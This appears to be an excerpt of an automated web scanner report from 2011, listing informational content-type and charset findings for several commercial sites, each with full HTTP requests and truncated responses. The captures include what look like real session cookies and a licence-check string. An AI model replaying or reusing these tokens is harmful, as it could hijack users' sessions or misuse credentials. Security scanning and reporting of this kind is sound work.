Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 5561

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="//www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Typ
...[SNIP]...

28.24. https://www.hackerguardian.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /

Request

GET / HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:34 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 18249
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Hackerguardian Home
...[SNIP]...

28.25. https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /hackerguardian/buy/pci_free_scan.html

Request

GET /hackerguardian/buy/pci_free_scan.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; currency=USD; region=North%20America; country=US; ap=; referrerURL=; entryURL=https%3A//www.hackerguardian.com/

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:00:41 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 16078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free HackerGuar
...[SNIP]...

28.26. https://www.hackerguardian.com/ssl-certificate-products/ssl-certificate-index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.hackerguardian.com
Path:   /ssl-certificate-products/ssl-certificate-index.html

Request

GET /ssl-certificate-products/ssl-certificate-index.html HTTP/1.1
Host: www.hackerguardian.com
Connection: keep-alive
Referer: https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=212060173.; __utmxx=212060173.; __utmz=212060173.1303748935.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=212060173.423105898.1303748935.1303748935.1303748935.1; ap=; referrerURL=; entryURL=https%3A//www.hackerguardian.com/; currency=USD; region=North%20America; country=US

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:06:07 GMT
Server: Apache
Accept-Ranges: bytes
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 22107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Comodo Products
...[SNIP]...

28.27. https://www.instantssl.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.instantssl.com
Path:   /

Request

GET / HTTP/1.1
Host: www.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 12:49:54 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 30428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>SSL Certificate F
...[SNIP]...

28.28. https://www.instantssl.com/ssl-certificate-products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.instantssl.com
Path:   /ssl-certificate-products/

Request

GET /ssl-certificate-products/ HTTP/1.1
Host: www.instantssl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 26 Apr 2011 12:49:55 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
Content-Length: 37063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!--START GWO HEADER -->
<!--GW
...[SNIP]...

28.29. https://www.mavitunasecurity.com/download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV

Request

GET /download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV HTTP/1.1
Host: www.mavitunasecurity.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23783536
Content-Type: application/octet-stream
X-Powered-By: ASP.NET
Content-Disposition: attachment; filename=NetsparkerSetup.exe
Date: Tue, 26 Apr 2011 12:49:56 GMT
Connection: close

MZ......................@.............................................    .!..L.!This program cannot be run in DOS mode.
$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i..i...it..iRichu..i........
...[SNIP]...

28.30. https://www.mavitunasecurity.com/support/checkupdate/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /support/checkupdate/

Request

GET /support/checkupdate/?lic=AAEAAAD/////AQAAAAAAAAAGAQAAAD4wNDYyLTZFNTctOTc3OS1EOTk4LUNBNTctRUU1QS1NRjQ0Q1pFNjhZRTY3QU0wRjRQQTZWUkgzQzRIUlJLVgs= HTTP/1.1
Host: www.mavitunasecurity.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 87
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:27:30 GMT

1.9.0.5
https://www.mavitunasecurity.com/download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV/

28.31. https://www.merrilledge.com/M/ScriptResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /M/ScriptResource.axd

Request

GET /M/ScriptResource.axd?d=_kI4qTY5PPvpU_Knw6h5Z3M2RPx09RuzOFKaUSEo7ajyABYkk5fs1FNRciPZnrVDFC6LeTu3PfiOnaLl4dmTu0UXW9C7I5zgYgaZelx3t87aS6aRIue5-aBIQk2nslI9M_92htix-JgRBrRomqrN0sOVuQlVEidJ1NtciBBXyjiVijME0FBOb5Z3PqEWCrQm0&t=634339830749808664 HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
Referer: https://www.merrilledge.com/m/pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Wed, 25 Apr 2012 06:00:54 GMT
Last-Modified: Tue, 22 Feb 2011 19:51:14 GMT
Content-Type: text/javasacript
Content-Length: 5666

...Type.registerNamespace('MerrillLynch.Application.ECMS.Service');
MerrillLynch.Application.ECMS.Service.ECMSContentService=function() {
MerrillLynch.Application.ECMS.Service.ECMSContentService.ini
...[SNIP]...

28.32. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...

28.33. https://www.merrilledge.com/publish/OSE/XML/MLTextChat.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /publish/OSE/XML/MLTextChat.xml

Request

GET /publish/OSE/XML/MLTextChat.xml HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
Referer: https://www.merrilledge.com/m/pages/home.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Content-Length: 4555
Content-Type: text/xml
Content-Location: https://www.merrilledge.com/publish/OSE/XML/MLTextChat.xml
Last-Modified: Thu, 19 Aug 2010 13:56:30 GMT
Accept-Ranges: bytes
ETag: "0bb253a63fcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 12:27:18 GMT

...<?xml version="1.0" encoding="utf-8" ?>
<Settings>
<Domain>.merrilledge.com</Domain>
<LivePersonUnit>MLDSales</LivePersonUnit>
<TestLpNumber>19026173</TestLpNumber> <!-- use for testing p
...[SNIP]...

28.34. https://www.mysecureconnect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mysecureconnect.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.mysecureconnect.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=zanmlo455tfi1auzquyujhbw

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:58:16 GMT
Content-Length: 6563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<!-- TCP80::HTTPStatus::OK --
...[SNIP]...

28.35. https://www.mysecureconnect.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mysecureconnect.com
Path:   /login.aspx

Request

GET /login.aspx HTTP/1.1
Host: www.mysecureconnect.com
Connection: keep-alive
Referer: http://www.secureconnect.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=g40h4p45omjxdryp2nasdx45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 23:57:56 GMT
Content-Length: 12063


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<!-- TCP80::HTTPStatus::OK --
...[SNIP]...

28.36. https://www.net-address.co.uk/manager.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.net-address.co.uk
Path:   /manager.asp

Request

GET /manager.asp? HTTP/1.1
Host: www.net-address.co.uk
Connection: keep-alive
Referer: http://www.net-address.co.uk/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCDSACCR=FAGMHKNCNDKBICBFHMKGLJCM

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 26 Apr 2011 13:48:11 GMT
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 3865
Content-Type: text/html
Cache-control: private

<html>
<head>
<title>Net-Address UK and international domain name registration including .com and .co.uk, with control panel management</title>
<meta http-equiv="content-type" content="text/html; c
...[SNIP]...

28.37. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/secure/customer/logon.pl

Request

GET /cgi-bin/secure/customer/logon.pl HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Referer: http://www.saintcorporation.com/products/order.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.2.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:52 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 2427

<html>
<head>
<link rel="stylesheet" href="../../../ext/imain.css" type="text/css">
<link rel="stylesheet" href="../../../ext/forms.css" type="text/css">
<link rel="stylesheet" href="../../../ext/widg
...[SNIP]...

28.38. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/shopcart/cartaction.pl

Request

POST /cgi-bin/shopcart/cartaction.pl HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Referer: http://www.saintcorporation.com/cgi-bin/shopcart/cart.pl
Cache-Control: max-age=0
Origin: http://www.saintcorporation.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.3.10.1303775066
Content-Length: 15

parts_cb=wsp50s

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:56 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>shop c
...[SNIP]...

28.39. https://www.saintcorporation.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.3.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:58:56 GMT
Server: Apache/2.2.15 (Unix)
Last-Modified: Tue, 09 Nov 2010 18:11:12 GMT
ETag: "1518d0b6-43a6-494a2aa713000"
Accept-Ranges: bytes
Content-Length: 17318
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

...... ..........F...00.... ..%...... .... ............... .h...>?..(... ...@...........................................................`@ ..`@..`......`.....`..........@..`@@..`@...`.......... ...`
...[SNIP]...

29. Multiple content types specified  previous  next
There are 2 instances of this issue:


29.1. http://learn.bridgefront.com/help/dhtml_search.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.bridgefront.com
Path:   /help/dhtml_search.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /help/dhtml_search.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: learn.bridgefront.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:17:03 GMT
Server: Apache/2.2.3 (Red Hat)
ETag: W/"7319-1302518297000"
Last-Modified: Mon, 11 Apr 2011 10:38:17 GMT
Content-Length: 7319
Connection: close
Content-Type: text/javascript

Page=new Array();
Page[0]=new Array("When you first log into the course, you will be presented with the Instruction screen. Pop-Up Blockers will stop this from automatically coming up. To view, simpl
...[SNIP]...
</title>\n";
Result+="<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>\n";
Result+='<script language="javascript" type="text/javascript" charset="utf-8" src="dhtml_search.js">
...[SNIP]...

29.2. http://translate.googleapis.com/translate_static/js/element/main.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.googleapis.com
Path:   /translate_static/js/element/main.js

Issue detail

The response contains multiple Content-type statements which are incompatible with one another. The following statements were received:

Request

GET /translate_static/js/element/main.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: translate.googleapis.com

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Last-Modified: Thu, 20 Jan 2011 00:45:53 GMT
Date: Tue, 26 Apr 2011 13:12:18 GMT
Expires: Mon, 25 Apr 2011 19:09:13 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 4385
Cache-Control: public, max-age=7200
Content-Length: 96489

(function(){function h(a){throw a;}var i=true,j=null,l=false,aa=navigator,ba=Error,ca=Boolean,m=undefined,da=encodeURIComponent,ea=parseInt,fa=parseFloat,n=String,p=window,ga=Number,r=Object,u=documen
...[SNIP]...
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF8"><link rel="stylesheet" type="text/css" href="',a.A,'">
...[SNIP]...

30. HTML does not specify charset  previous  next
There are 28 instances of this issue:


30.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Request

GET /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BiHT1ua22Tfb3BsiAlgfOkNDvApuU3_0By7eQwRPThvmbSgAQARgBIL7O5Q04AFDBnMn5BWDJ7oOI8KPsEqABzdXY6QOyAQZ4c3MuY3i6AQk3Mjh4OTBfYXPIAQnaAX9odHRwOi8veHNzLmN4LzIwMTEvMDQvMjYvZG9yay9hY2NvdW50c25hcGNvbS9yZWZsZWN0ZWQteHNzLWNyb3NzLXNpdGUtc2NyaXB0aW5nLWNhcGVjODYtY3dlNzktZG9yay1naGRiLXJlcG9ydC1leGFtcGxlLXBvYy5odG1smAKAMrgCGMACBcgCg5qmGagDAdEDHROmdxAz1pjoA90F6AO6AugD4gX1AwIAAMQ&num=1&sig=AGiWqtzP3yz2QjoDPM2IJfR5MStta_SDrQ&client=ca-pub-4063878933780912&adurl=;ord=2114915439? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303835509&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F26%2Fdork%2Faccountsnapcom%2Freflected-xss-cross-site-scripting-capec86-cwe79-dork-ghdb-report-example-poc.html&dt=1303817665946&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303817665999&frm=0&adk=1607234649&ga_vid=1111573264.1303817666&ga_sid=1303817666&ga_hid=1356844413&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=907&bih=928&fu=0&ifi=1&dtd=238&xpc=ql02NCTGR1&p=http%3A//xss.cx
